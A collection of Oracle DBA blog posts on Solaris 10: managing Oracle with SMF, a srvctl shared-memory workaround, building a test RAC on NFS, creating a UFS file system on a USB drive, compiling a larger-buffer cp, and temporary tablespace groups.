In this post, I will demonstrate how to configure an Oracle database and listener as services managed by SMF. This means that Oracle will start automatically on boot, so we don't need to go to the bother of writing a startup script for Oracle (even though it's not really that hard; see Howard Rogers's 10gR2 installation guide on Solaris for an example). A traditional startup script could still be created and placed in the appropriate /etc/rc*.d directory. These scripts are referred to as legacy run services in Solaris 10 and will not benefit from the precise fault management provided by SMF.

In this post, I am only talking about a single instance environment and I am not using ASM for storage. Also, please note that this post is not an extensive guide on how to do this by any means; it's just a short post on how to get it working. For more information on SMF and Solaris 10 in general, have a look through Sun's excellent online documentation at http://docs.sun.com.

Adding Oracle as a Service

To create a new service in SMF, a number of steps need to be performed (see the Solaris Service Management Facility - Service Developer Introduction for more details). Luckily for me, Joost Mulders has already done all the necessary work for performing this for Oracle. The package for installing ora-smf is available from here.

To install this package, download it to an appropriate location (in my case, the root user's home directory) and perform the following:

# cd /var/svc/manifest/application
# mkdir database
# cd ~
# pkgadd -d orasmf-1.5.pkg

There is now some configuration which needs to be performed. Navigate to the /var/svc/manifest/application/database directory. The following files will be present there:

# ls -l
-r--r--r--   1 root     bin         2167 Apr 26 09:24 oracle-database-instance.xml
-r--r--r--   1 root     bin         5722 Dec 28  2005 oracle-database-service.xml
-r--r--r--   1 root     bin         2128 Apr 26 09:31 oracle-listener-instance.xml
-r--r--r--   1 root     bin         4295 Dec 28  2005 oracle-listener-service.xml
#

The two files which must be edited are:

oracle-database-instance.xml
oracle-listener-instance.xml

My oracle-database-instance.xml file looked like the following after I edited it according to my environment:

and my oracle-listener-instance.xml file looked like so after editing:

In the above configuration files, you can see that I have an instance (orcl1) whose ORACLE_HOME is /u01/app/oracle/product/10.2.0/db_1. I also have a resource project named oracle, and the username and group which the Oracle software is installed as are oracle and dba respectively. The most important parameters which must be changed according to your environment are:

ORACLE_HOME
ORACLE_SID
User
Group
Project
Working Directory (in my case, I set it to the same value as ORACLE_HOME)
Instance name (needs to be the same as the ORACLE_SID for the database and the listener name for the listener)

Once these modifications have been performed according to your environment, execute the following to bring the database and listener under SMF control:

# svccfg import /var/svc/manifest/application/database/oracle-database-instance.xml
# svccfg import /var/svc/manifest/application/database/oracle-listener-instance.xml

Now, shut down the database and listener on the host (this post presumes you are configuring only one database and listener, though it shouldn't be too difficult to configure multiple instances). Then execute the following to enable the database and listener as SMF services and start them:

# svcadm enable svc:/application/oracle/database:orcl1
# svcadm enable svc:/application/oracle/listener:LISTENER

In the commands above, the database instance is orcl1 and the listener name is LISTENER. Logs of this process are available in the /var/svc/log directory.

# cd /var/svc/log
# ls -ltr application-*
-rw-r--r--   1 root     root          45 Apr 25 20:15 application-management-webmin:default.log
-rw-r--r--   1 root     root         120 Apr 25 20:15 application-print-server:default.log
-rw-r--r--   1 root     root          45 Apr 25 20:15 application-print-ipp-listener:default.log
-rw-r--r--   1 root     root          75 Apr 25 20:16 application-gdm2-login:default.log
-rw-r--r--   1 root     root         566 Apr 26 07:07 application-print-cleanup:default.log
-rw-r--r--   1 root     root         603 Apr 26 07:07 application-font-fc-cache:default.log
-rw-r--r--   1 root     root        3318 Apr 26 10:45 application-oracle-database:orcl1.log
-rw-r--r--   1 root     root        6847 Apr 26 10:47 application-oracle-listener:LISTENER.log
#
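The log file names in the listing above appear to follow directly from the service FMRIs used with svcadm: the svc:/ prefix is dropped and the remaining slashes become hyphens. A small Python sketch of that mapping follows. The function name smf_log_path is hypothetical, and the rule is inferred from the listing rather than taken from the SMF documentation.

```python
def smf_log_path(fmri: str, log_dir: str = "/var/svc/log") -> str:
    """Guess the SMF log file for a service FMRI.

    Assumption (inferred from the directory listing): strip the
    'svc:/' prefix, replace '/' with '-', and append '.log'.
    """
    name = fmri
    if name.startswith("svc:/"):
        name = name[len("svc:/"):]
    return f"{log_dir}/{name.replace('/', '-')}.log"


print(smf_log_path("svc:/application/oracle/database:orcl1"))
# /var/svc/log/application-oracle-database:orcl1.log
print(smf_log_path("svc:/application/oracle/listener:LISTENER"))
# /var/svc/log/application-oracle-listener:LISTENER.log
```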

Testing Out SMF
Now, to test out some of the functionality of SMF, I'm going to kill the pmon process of the orcl1 database instance. SMF should automatically restart the instance.

# ps -ef | grep pmon
  oracle  5113     1   0 10:19:22 ?           0:01 ora_pmon_orcl1
# kill -9 5113

Roughly 10 to 20 seconds later, the database came back up. Looking at the application-oracle-database:orcl1.log file, we can see what happened:

[ Apr 26 10:44:52 Stopping because process received fatal signal from outside the service. ]
[ Apr 26 10:44:52 Executing stop method ("/lib/svc/method/ora-smf stop database orcl1")]
**********************************************************************
********************************************************************** 
some of '^ora_(lgwr|dbw0|smon|pmon|reco|ckpt)_orcl1' died.
** Aborting instance orcl1.
*********************************************************************
*********************************************************************
ORACLE instance shut down.
[ Apr 26 10:44:53 Method "stop" exited with status 0 ]
[ Apr 26 10:44:53 Executing start method ("/lib/svc/method/ora-smf start database orcl1") ]
ORACLE instance started.
Total System Global Area  251658240 bytes
Fixed Size                  1279600 bytes
Variable Size              83888528 bytes
Database Buffers          163577856 bytes
Redo Buffers                2912256 bytes
Database mounted.
Database opened.
database orcl1 is OPEN.
[ Apr 26 10:45:05 Method "start" exited with status 0 ]

As can be seen from the content of my log file above, SMF discovered that the instance crashed and restarted it automatically. That seems pretty cool to me!
Now, let's try out the same procedure with the listener service.
Almost instantaneously, the listener came back up. Looking through the application-oracle-listener:LISTENER.log file shows us what SMF did:

[ Apr 26 10:47:50 Stopping because process received fatal signal from outside the service. ]
[ Apr 26 10:47:50 Executing stop method ("/lib/svc/method/ora-smf stop listener LISTENER") ]

LSNRCTL for Solaris: Version 10.2.0.2.0 - Production on 26-APR-2007 10:47:51

Copyright (c) 1991, 2005, Oracle.  All rights reserved.

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=solaris01)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC0)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
[ Apr 26 10:47:52 Method "stop" exited with status 0 ]
[ Apr 26 10:47:52 Executing start method ("/lib/svc/method/ora-smf start listener LISTENER") ]

LSNRCTL for Solaris: Version 10.2.0.2.0 - Production on 26-APR-2007 10:47:52

Copyright (c) 1991, 2005, Oracle.  All rights reserved.

Starting /u01/app/oracle/product/10.2.0/db_1/bin/tnslsnr: please wait...

TNSLSNR for Solaris: Version 10.2.0.2.0 - Production
System parameter file is /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
Log messages written to /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=solaris01)(PORT=1521)))
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC0)))

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=solaris01)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias                     LISTENER
Version                   TNSLSNR for Solaris: Version 10.2.0.2.0 - Production
Start Date                26-APR-2007 10:47:54
Uptime                    0 days 0 hr. 0 min. 0 sec
Trace Level               off
Security                  ON: Local OS Authentication
SNMP                      OFF
Listener Parameter File   /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
Listener Log File         /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=solaris01)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC0)))
Services Summary...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
The command completed successfully
listener LISTENER start succeeded
[ Apr 26 10:47:54 Method "start" exited with status 0 ]

I haven't really played around too much else with SMF and Oracle at the moment. Obviously, Oracle has a lot of this functionality already available through Enterprise Manager using corrective actions.
Also, it's worth pointing out that Oracle does not currently support SMF and does not provide any information or documentation on configuring Oracle with SMF. Metalink Note 398580.1 and Bug 5340239 have more information on this from Oracle.

srvctl Error in Solaris 10 RAC Environment

2008-11-29T00:00:00-08:00

If you install a RAC environment on Solaris 10 and set kernel parameters using resource control projects (which is the recommended method in Solaris 10), then you will likely encounter issues when trying to start the cluster database or an individual instance using the srvctl utility. As an example, this is likely what you will encounter:

$ srvctl start instance -d orclrac -i orclrac2
PRKP-1001 : Error starting instance orclrac2 on node nap-rac02
CRS-0215: Could not start resource 'ora.orclrac.orclrac2.inst'.
$

along with the following messages in the alert log:

Tue Apr 24 11:36:21 2007
Starting ORACLE instance (normal)
Tue Apr 24 11:36:21 2007
WARNING: EINVAL creating segment of size 0x0000000024802000
fix shm parameters in /etc/system or equivalent

This happens because the srvctl utility does not pick up the shared memory settings defined through resource controls (the ones prctl reports); it reads the settings from the /etc/system file instead. This is documented in bug 5340239 on Metalink.

The only workaround for this at the moment (that I know of) is to manually add the necessary semaphore and shared memory parameters to the /etc/system file, for example:

set semsys:seminfo_semmni=100
set semsys:seminfo_semmsl=256
set shmsys:shminfo_shmmax=4294967295
set shmsys:shminfo_shmmni=100

Oracle 10gR2 RAC with Solaris 10 and NFS

2008-11-29T00:00:00-08:00

Recently, I set up a two-node RAC environment for testing using Solaris 10 and NFS. This environment consisted of 2 RAC nodes running Solaris 10 and a Solaris 10 server which served as my NFS filer.
I thought it might prove useful to create a post on how this is achieved as I found it to be a relatively quick way to set up a cheap test RAC environment. Obviously, this setup is not supported by Oracle and should only be used for development and testing purposes.
This post will only detail the steps which are specific to this setup, meaning I won't talk about a number of steps which need to be performed, such as setting up user equivalence and creating the database. I will mention when these steps should be performed, but I point you to Jeffrey Hunter's article on building a 10gR2 RAC on Linux with iSCSI for more information on steps like this.

Overview of the Environment

Here is a diagram of the architecture used which is based on Jeff Hunter's diagram from the previously mentioned article (click on the image to get a larger view):

You can see that I am using an external hard drive attached to the NFS filer for storage. This external hard drive will hold all my database and Clusterware files.
Again, the hardware used is the exact same as the hardware used in Jeff Hunter's article. Notice however that I do not have a public interface configured for my NFS filer. This is mainly because I did not have any spare network interfaces lying around for me to use!

Getting Started

To get started, we will install Solaris 10 for the x86 architecture on all three machines. The ISO images for Solaris 10 x86 can be downloaded from Sun's website here. You will need a Sun Online account to access the downloads but registration is free and painless.
I won't be covering the Solaris 10 installation process here but for more information, I refer you to the official Sun basic installation guide found here.
When installing Solaris 10, make sure that you configure both network interfaces. Ensure that you do not use DHCP for either network interface and specify all the necessary details for your environment.
After installation, you should update the /etc/inet/hosts file on all hosts. For my environment as shown in the diagram above, my hosts file looked like the following:

#
# Internet host table
#
127.0.0.1 localhost

# Public Network - (pcn0)
172.16.16.27 solaris1
172.16.16.28 solaris2

# Private Interconnect - (pcn1)
192.168.2.111 solaris1-priv
192.168.2.112 solaris2-priv

# Public Virtual IP (VIP) addresses for - (pcn0)
172.16.16.31 solaris1-vip
172.16.16.32 solaris2-vip

# NFS Filer - (pcn1)
192.168.2.195 solaris-filer

The network settings on the RAC nodes will need to be adjusted as they can affect cluster interconnect transmissions. The UDP parameters which need to be modified on Solaris are udp_recv_hiwat and udp_xmit_hiwat. The default values for these parameters on Solaris 10 are 57344 bytes. Oracle recommends that these parameters are set to at least 65536 bytes.
To see what these parameters are currently set to, perform the following:

# ndd /dev/udp udp_xmit_hiwat
57344
# ndd /dev/udp udp_recv_hiwat
57344

To set the values of these parameters to 65536 bytes in current memory, perform the following:

# ndd -set /dev/udp udp_xmit_hiwat 65536
# ndd -set /dev/udp udp_recv_hiwat 65536
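The check-then-set logic above can be sketched in Python as follows. This only builds the command strings; it does not call ndd itself. The function name ndd_commands and the dictionary of current values are illustrative assumptions, with the values copied from the ndd output shown earlier.

```python
from typing import Dict, List

# Minimum recommended by Oracle, per the text above.
RECOMMENDED_MIN = 65536


def ndd_commands(current: Dict[str, int], minimum: int = RECOMMENDED_MIN) -> List[str]:
    """Return the 'ndd -set' commands needed to raise low UDP parameters."""
    return [
        f"ndd -set /dev/udp {name} {minimum}"
        for name, value in sorted(current.items())
        if value < minimum
    ]


# Values as reported by 'ndd /dev/udp <parameter>' on a default install.
current_values = {"udp_xmit_hiwat": 57344, "udp_recv_hiwat": 57344}
for command in ndd_commands(current_values):
    print(command)
```

Parameters that already meet the minimum produce no command, so running the sketch against an already tuned system prints nothing.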

Now we obviously want these parameters to be set to these values when the system boots. The official Oracle documentation is incorrect when it states that the parameters are set on boot when they are placed in the /etc/system file. The values placed in /etc/system will have no effect on Solaris 10. Bug 5237047 has more information on this.
So what we will do is to create a startup script called udp_rac in /etc/init.d. This script will have the following contents:

#!/sbin/sh
case "$1" in
'start')
ndd -set /dev/udp udp_xmit_hiwat 65536
ndd -set /dev/udp udp_recv_hiwat 65536
;;
'state')
ndd /dev/udp udp_xmit_hiwat
ndd /dev/udp udp_recv_hiwat
;;
*)
echo "Usage: $0 { start | state }"
exit 1
;;
esac

Now, we need to create a link to this script in the /etc/rc3.d directory:

# ln -s /etc/init.d/udp_rac /etc/rc3.d/S86udp_rac

Configuring the NFS Filer

Now that we have Solaris installed on all our machines, it's time to start configuring our NFS filer. As I mentioned before, I will be using an external hard drive for storing all my database files and Clusterware files. If you're not using an external hard drive you can ignore the next paragraph.
In my previous post, I talked about creating a UFS file system on an external hard drive in Solaris 10. I am going to be following that post exactly. So if you perform what I mention in that post, you will have a UFS file system ready for mounting.
Now, I have a UFS file system created on the /dev/dsk/c2t0d0s0 device. I will create a directory for mounting this file system and then mount it:

# mkdir -p /export/rac
# mount -F ufs /dev/dsk/c2t0d0s0 /export/rac

Now that we have created the base directory, let's create directories inside this which will contain the various files for our RAC environment.

# cd /export/rac
# mkdir crs_files
# mkdir oradata

The /export/rac/crs_files directory will contain the OCR and the voting disk files used by Oracle Clusterware. The /export/rac/oradata directory will contain all the Oracle data files, control files, redo logs and archive logs for the cluster database.
Obviously, this setup is not ideal since everything is on the same device. For setting up this environment, I didn't care. All I wanted to do was get a quick RAC environment up and running and show how easily it can be done with NFS. More care should be taken in the previous step but I'm lazy...
Now we need to make these directories accessible to the Oracle RAC nodes. I will be accomplishing this using NFS. We first need to edit the /etc/dfs/dfstab file to specify which directories we want to share and what options we want to use when sharing them. The dfstab file I configured looked like so:

#       Place share(1M) commands here for automatic execution
#       on entering init state 3.
#
#       Issue the command 'svcadm enable network/nfs/server' to
#       run the NFS daemon processes and the share commands, after adding
#       the very first entry to this file.
#
#       share [-F fstype] [ -o options] [-d ""]  [resource]
#       .e.g,
#       share  -F nfs  -o rw=engineering  -d "home dirs"  /export/home2
share -F nfs -o rw,anon=175 /export/rac/crs_files
share -F nfs -o rw,anon=175 /export/rac/oradata

The value of the anon option in the dfstab file shown above is the user ID of the oracle user on the cluster nodes. This user ID should be the same on all nodes in the cluster.
After editing the dfstab file, the NFS daemon process needs to be restarted. You can do this on Solaris 10 like so:

# svcadm restart nfs/server

To check if the directories are exported correctly, the following can be performed from the NFS filer:

# share
-               /export/rac/crs_files   rw,anon=175   ""
-               /export/rac/oradata     rw,anon=175   ""
#

The specified directories should now be accessible from the Oracle RAC nodes. To verify that these directories are accessible from the RAC nodes, run the following from both nodes (solaris1 and solaris2 in my case):

# dfshares solaris-filer
RESOURCE                                  SERVER ACCESS    TRANSPORT
solaris-filer:/export/rac/crs_files    solaris-filer  -         -
solaris-filer:/export/rac/oradata      solaris-filer  -         -
#

The output should be the same on both nodes.

Configure NFS Exports on Oracle RAC Nodes

Now we need to configure the NFS exports on the two nodes in the cluster. First, we must create directories where we will be mounting the exports. In my case, I did this:

# mkdir /u02
# mkdir /u03

I am not using u01 as I'm using this directory for installing the software. I will not be configuring a shared Oracle home in this article as I wanted to keep things as simple as possible but that might serve as a good future blog post.
For mounting the NFS exports, there are specific mount options which must be used with NFS in an Oracle RAC environment. The mount command which I used to manually mount these exports is as follows:

# mount -F nfs -o rw,hard,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3 \
solaris-filer:/export/rac/crs_files /u02
# mount -F nfs -o rw,hard,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3 \
solaris-filer:/export/rac/oradata /u03

Obviously, we want these exports to be mounted at boot. This is accomplished by adding the necessary lines to the /etc/vfstab file. The extra lines which I added to the /etc/vfstab file on both nodes were (the output below did not come out very well originally so I had to split each line into 2 lines):

solaris-filer:/export/rac/crs_files   -   /u02   nfs   -   yes
rw,hard,bg,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3
solaris-filer:/export/rac/oradata     -   /u03   nfs   -   yes
rw,hard,bg,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3
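Since each entry above had to be split across two lines for display, it may help to show how the single-line form is assembled. Each vfstab entry is one line with seven whitespace-separated fields: device to mount, device to fsck, mount point, file system type, fsck pass, mount at boot, and mount options. The Python sketch below joins those fields; the function name vfstab_entry is hypothetical.

```python
from typing import List

# Mount options used for the RAC NFS mounts in this post.
RAC_NFS_OPTIONS = [
    "rw", "hard", "bg", "nointr", "rsize=32768", "wsize=32768",
    "noac", "proto=tcp", "forcedirectio", "vers=3",
]


def vfstab_entry(device: str, mount_point: str, options: List[str],
                 fs_type: str = "nfs", mount_at_boot: str = "yes") -> str:
    """Build one vfstab line; '-' marks the unused fsck device and pass."""
    fields = [device, "-", mount_point, fs_type, "-", mount_at_boot,
              ",".join(options)]
    return "\t".join(fields)


print(vfstab_entry("solaris-filer:/export/rac/crs_files", "/u02", RAC_NFS_OPTIONS))
print(vfstab_entry("solaris-filer:/export/rac/oradata", "/u03", RAC_NFS_OPTIONS))
```

In the real file, the options must stay on the same line as the rest of the entry.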

Configure the Solaris Servers for Oracle

Now that we have shared storage set up, it's time to configure the Solaris servers on which we will be installing Oracle. One little thing which must be performed on Solaris is to create symbolic links for the SSH binaries. The Oracle Universal Installer and configuration assistants (such as NETCA) will look for the SSH binaries in the wrong location on Solaris. Even if the SSH binaries are included in your path when you start these programs, they will still look for the binaries in the wrong location. On Solaris, the SSH binaries are located in the /usr/bin directory by default. The OUI will throw an error stating that it cannot find the ssh or scp binaries. My workaround was to simply create a symbolic link in the /usr/local/bin directory for these binaries.

# ln -s /usr/bin/ssh /usr/local/bin/ssh
# ln -s /usr/bin/scp /usr/local/bin/scp

You should also create the oracle user and directories now before configuring kernel parameters.
For configuring and setting kernel parameters on Solaris 10 for Oracle, I point you to this excellent installation guide for Oracle on Solaris 10 by Howard Rogers. It contains all the necessary information you need for configuring your Solaris 10 system for Oracle. Just remember to perform all steps mentioned in his article on both nodes in the cluster.

What's Left to Do

From here on in, it's quite easy to follow Jeff Hunter's article. Obviously, you won't be using ASM. The only differences between what to do now and what he has documented are file locations. So you could follow along from section 14 and you should be able to get a 10gR2 RAC environment up and running. Obviously, there are some sections, such as setting up OCFS2 and ASMLib, that can be left out since we are installing on Solaris and not Linux.

Creating a UFS File System on an External Hard Drive with Solaris 10

2008-11-29T00:00:00-08:00

Recently, I wanted to create a UFS file system on a Maxtor OneTouch II external hard drive I have. I wanted to use the external hard drive for storing some large files and I was going to use the drive exclusively with one of my Solaris systems. Now, I didn’t find much information on the web about how to perform this with Solaris (maybe I wasn’t searching very well or something) so I thought I would post the procedure I followed here so I’ll know how to do it again if I need to.

After plugging the hard drive into my system via one of the USB ports, we can verify that the disk was recognized by the OS by examining the /var/adm/messages file. With the hard drive I was using, I saw entries like the following:

Mar  2 13:10:33 solaris-filer usba: [ID 912658 kern.info] USB 2.0 device (usbd49,7100) 
operating at hi speed (USB 2.x) on USB 2.0 root hub: storage@3, scsa2usb0 at bus address 2
Mar  2 13:10:33 solaris-filer usba: [ID 349649 kern.info]       Maxtor OneTouch II L60LHYQG
Mar  2 13:10:33 solaris-filer genunix: [ID 936769 kern.info] scsa2usb0 is /pci@0,0/pci1028,11d@1d,7/storage@3
Mar  2 13:10:33 solaris-filer genunix: [ID 408114 kern.info] /pci@0,0/pci1028,11d@1d,7/storage@3 
(scsa2usb0) online
Mar  2 13:10:33 solaris-filer scsi: [ID 193665 kern.info] sd1 at scsa2usb0: target 0 lun 0

The dmesg command could also be used to see similar information. Also, we could use the rmformat command (this lists removable media) to see this information in a much nicer format like so:

# rmformat -l
Looking for devices...
   1. Logical Node: /dev/rdsk/c1t0d0p0
      Physical Node: /pci@0,0/pci-ide@1f,1/ide@1/sd@0,0
      Connected Device: QSI      CDRW/DVD SBW242U UD25
      Device Type: DVD Reader
   2. Logical Node: /dev/rdsk/c2t0d0p0
      Physical Node: /pci@0,0/pci1028,11d@1d,7/storage@3/disk@0,0
      Connected Device: Maxtor   OneTouch II      023g
      Device Type: Removable
#

Now that we know the drive has been identified by Solaris (as /dev/rdsk/c2t0d0p0), we need to create one Solaris partition (this is Solaris 10 running on the x86 architecture) that uses the whole disk. This is accomplished by passing the -B flag to the fdisk command, like so:

# fdisk -B /dev/rdsk/c2t0d0p0

Now we will print the disk table to standard out like so:

# fdisk -W - /dev/rdsk/c2t0d0p0

This will output the following information to the screen for the hard drive I am using:

* /dev/rdsk/c2t0d0p0 default fdisk table
* Dimensions:
*    512 bytes/sector
*     63 sectors/track
*    255 tracks/cylinder
*   36483 cylinders
*
* systid:
*    1: DOSOS12
*    2: PCIXOS
*    4: DOSOS16
*    5: EXTDOS
*    6: DOSBIG
*    7: FDISK_IFS
*    8: FDISK_AIXBOOT
*    9: FDISK_AIXDATA
*   10: FDISK_0S2BOOT
*   11: FDISK_WINDOWS
*   12: FDISK_EXT_WIN
*   14: FDISK_FAT95
*   15: FDISK_EXTLBA
*   18: DIAGPART
*   65: FDISK_LINUX
*   82: FDISK_CPM
*   86: DOSDATA
*   98: OTHEROS
*   99: UNIXOS
*  101: FDISK_NOVELL3
*  119: FDISK_QNX4
*  120: FDISK_QNX42
*  121: FDISK_QNX43
*  130: SUNIXOS
*  131: FDISK_LINUXNAT
*  134: FDISK_NTFSVOL1
*  135: FDISK_NTFSVOL2
*  165: FDISK_BSD
*  167: FDISK_NEXTSTEP
*  183: FDISK_BSDIFS
*  184: FDISK_BSDISWAP
*  190: X86BOOT
*  191: SUNIXOS2
*  238: EFI_PMBR
*  239: EFI_FS
*

* Id    Act  Bhead  Bsect  Bcyl    Ehead  Esect  Ecyl    Rsect    Numsect
191   128  0      1      1       254    63     1023    16065    586083330

We now need to calculate the maximum amount of usable storage. This is done by multiplying bytes/sector (512 in my case) by the number of sectors (Numsect) listed at the bottom of the output shown above. We then divide this number by 1024 * 1024 to yield MB.

So in my case, this will work out as 286173.5009765625 MB.
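For anyone who wants to repeat the calculation for a different disk, here is the same arithmetic as a short Python sketch. The constants are copied from the fdisk output above; the function name usable_mb is just for illustration.

```python
BYTES_PER_SECTOR = 512      # from the "Dimensions" section of the fdisk output
NUM_SECTORS = 586083330     # the Numsect column of the partition entry


def usable_mb(num_sectors: int, bytes_per_sector: int = BYTES_PER_SECTOR) -> float:
    """Convert a sector count to megabytes (1 MB = 1024 * 1024 bytes)."""
    return num_sectors * bytes_per_sector / (1024 * 1024)


print(usable_mb(NUM_SECTORS))  # 286173.5009765625
```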

Now, we need to set up a partition table file. This will be a regular text file and you can name it whatever you like. For the sake of this post, I will name it disk_slices.txt. The contents of this file are:

slices: 0 = 2MB, 286170MB, "wm", "root" :
      1 = 0, 1MB, "wu", "boot" :
      2 = 0, 286172MB, "wm", "backup"
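As a quick sanity check, the slice definitions can be compared against the usable size worked out earlier. The Python sketch below assumes each slice is given as an offset followed by a size, both in MB, which is how I read the file above. The names SLICES and slices_fit are made up for this example.

```python
# Usable size in MB: bytes/sector * Numsect / (1024 * 1024).
USABLE_MB = 512 * 586083330 / (1024 * 1024)

# slice number -> (offset in MB, size in MB), copied from disk_slices.txt
SLICES = {
    0: (2, 286170),   # root
    1: (0, 1),        # boot
    2: (0, 286172),   # backup
}


def slices_fit(slices: dict, usable_mb: float) -> bool:
    """True if every slice ends at or before the end of the usable space."""
    return all(offset + size <= usable_mb for offset, size in slices.values())


print(slices_fit(SLICES, USABLE_MB))  # True
```

Slice 0 ends at 2 + 286170 = 286172 MB, which is also where the backup slice ends, and both are below the 286173.5 MB available.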

To create these slices on the disk, we run:

# rmformat -s disk_slices.txt /dev/rdsk/c2t0d0p0
# devfsadm
# devfsadm -C

To create the UFS file system on the newly created slice, I run the following and the output from running this command is also shown:

# newfs /dev/rdsk/c2t0d0s0
newfs: construct a new file system /dev/rdsk/c2t0d0s0: (y/n)? y
/dev/rdsk/c2t0d0s0:     586076160 sectors in 95390 cylinders of 48 tracks, 128 sectors
      286170.0MB in 5962 cyl groups (16 c/g, 48.00MB/g, 5824 i/g)
super-block backups (for fsck -F ufs -o b=#) at:
32, 98464, 196896, 295328, 393760, 492192, 590624, 689056, 787488, 885920,
Initializing cylinder groups:
...............................................................................
........................................
super-block backups for last 10 cylinder groups at:
585105440, 585203872, 585302304, 585400736, 585499168, 585597600, 585696032,
585794464, 585892896, 585991328
#

And now I’m finished. I have a UFS file system created on my USB hard drive which can be mounted by my Solaris system. To mount this file system, I use the block device for slice 0 (the slice the file system was created on):

# mount -F ufs /dev/dsk/c2t0d0s0 /u01

Building a Modified cp Binary on Solaris 10

2008-11-29T00:00:00-08:00

I thought I would write a post on how I setup my Solaris 10 system to build an improved version of the stock cp(1) utility that comes with Solaris 10 in case anyone arrives here from Kevin Closson’s blog. If you are looking for more background information on why I am performing this modification, have a look at this post by Kevin Closson.

GNU Core Utilities

We need to download the source code for the cp utility that we will be modifying. This source code is available as part of the GNU Core Utilities.

Coreutils 5.2.1

Download the software to an appropriate location on your system.

Modifying the Code

Untar the code first on your system.

# gunzip coreutils-5.2.1.tar.gz
# tar xvf coreutils-5.2.1.tar

Proceed to the coreutils-5.2.1/src directory. Open the copy.c file with an editor. The following are the differences between the modified copy.c file and the original copy.c file:

# diff -b copy.c.orig copy.c
287c315
<       buf_size = ST_BLKSIZE (sb);
---
>       /* buf_size = ST_BLKSIZE (sb);*/
288a317,319
>
>      buf_size = 8388608 ;
>
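The new value, 8388608, is 8 MB (8 * 1024 * 1024 bytes), so each read and write in the copy loop now moves up to 8 MB instead of one file system block. The Python sketch below is not the coreutils code; it is a simplified copy loop with a hypothetical copy_stream function, meant only to show how the buffer size determines the number of read/write calls.

```python
import io

BUF_SIZE = 8388608  # 8 MB, the value hard-coded in the modified copy.c


def copy_stream(src, dst, buf_size: int = BUF_SIZE) -> int:
    """Copy src to dst in buf_size chunks; return the number of chunks copied."""
    chunks = 0
    while True:
        chunk = src.read(buf_size)
        if not chunk:
            break
        dst.write(chunk)
        chunks += 1
    return chunks


data = b"x" * (16 * 1024 * 1024)  # 16 MB of sample data
print(copy_stream(io.BytesIO(data), io.BytesIO(), buf_size=8192))  # 2048
print(copy_stream(io.BytesIO(data), io.BytesIO()))                 # 2
```

With an 8 KB buffer, the 16 MB sample takes 2048 iterations; with the 8 MB buffer it takes 2.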

Building the Binary

To build the modified cp binary, navigate first to the coreutils-5.2.1 directory. Then enter the following (ensure that the gcc binary is in your PATH first; it is located at /usr/sfw/bin/):

# ./configure
# /usr/ccs/bin/make

We don’t want to run make install, as is usual when building something from source like this, because it would replace the stock cp(1) utility. Instead, we will copy the cp binary located in the coreutils-5.2.1/src directory like so:

# cp coreutils-5.2.1/src/cp /usr/bin/cp8m

Results of using the Modified cp

See Kevin Closson's post on copying files on Solaris for some in-depth discussion of this topic and more information on the reasoning behind making this modification to the cp(1) utility.

White Paper at Oracle OpenWorld

2008-11-25T00:00:00-08:00

A white paper that I helped write is being presented at Oracle OpenWorld this week. The paper is entitled ‘High Availability Options for the Oracle Database’. It is being presented by Dan Norris, and I wrote the sections on Export/Import and Data Pump. The paper is available for download from the IT Convergence website here.

Dan is kinda like my mentor here at IT Convergence. He has a lot of knowledge and experience with Oracle especially with RAC and is quite well known in the Oracle community.

Lately, I’ve been working on setting up a cheap 10g RAC environment in the office for testing and educational purposes. The RAC is up and running now. I followed this excellent article by Jeffrey Hunter on setting up a RAC environment on a budget!

OCFS2 would not play nice for me though so I decided to use RAW devices instead of OCFS like Mr. Hunter did in his article. Besides that though, I pretty much followed his article and was able to get my 10g RAC up and running (after a small bit of hassle with the Oracle firewire modules!).

Temporary Tablespace Groups

2008-11-25T00:00:00-08:00

Temporary tablespace groups are a new feature introduced in Oracle 10g. A temporary tablespace group is a list of tablespaces and is implicitly created when the first temporary tablespace is assigned to it. Its members can only be temporary tablespaces.

You can specify a tablespace group name wherever a tablespace name would appear when you assign a default temporary tablespace for the database or a temporary tablespace for a user. Using a tablespace group, rather than a single temporary tablespace, can alleviate problems caused where one tablespace is inadequate to hold the results of a sort, particularly on a table that has many partitions. A tablespace group enables parallel execution servers in a single parallel operation to use multiple temporary tablespaces.

Group Creation

You do not explicitly create a tablespace group. Rather, it is created implicitly when you assign the first temporary tablespace to the group. The group is deleted when the last temporary tablespace it contains is removed from it.
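
The lifecycle just described can be sketched with a toy in-memory model. This is not how Oracle implements groups; the class TablespaceGroups and its assign method are hypothetical names, and the model assumes a tablespace belongs to at most one group at a time.

```python
class TablespaceGroups:
    """Toy in-memory model of temporary tablespace group membership."""

    def __init__(self):
        self.groups = {}  # group name -> set of member tablespace names

    def assign(self, tablespace, group):
        """Put a tablespace into a group; an empty string means no group."""
        # Assumption: a tablespace is in at most one group, so leave any old one.
        for name in list(self.groups):
            self.groups[name].discard(tablespace)
            if not self.groups[name]:
                del self.groups[name]  # last member removed: the group disappears
        if group:
            # The first assignment implicitly creates the group.
            self.groups.setdefault(group, set()).add(tablespace)
```

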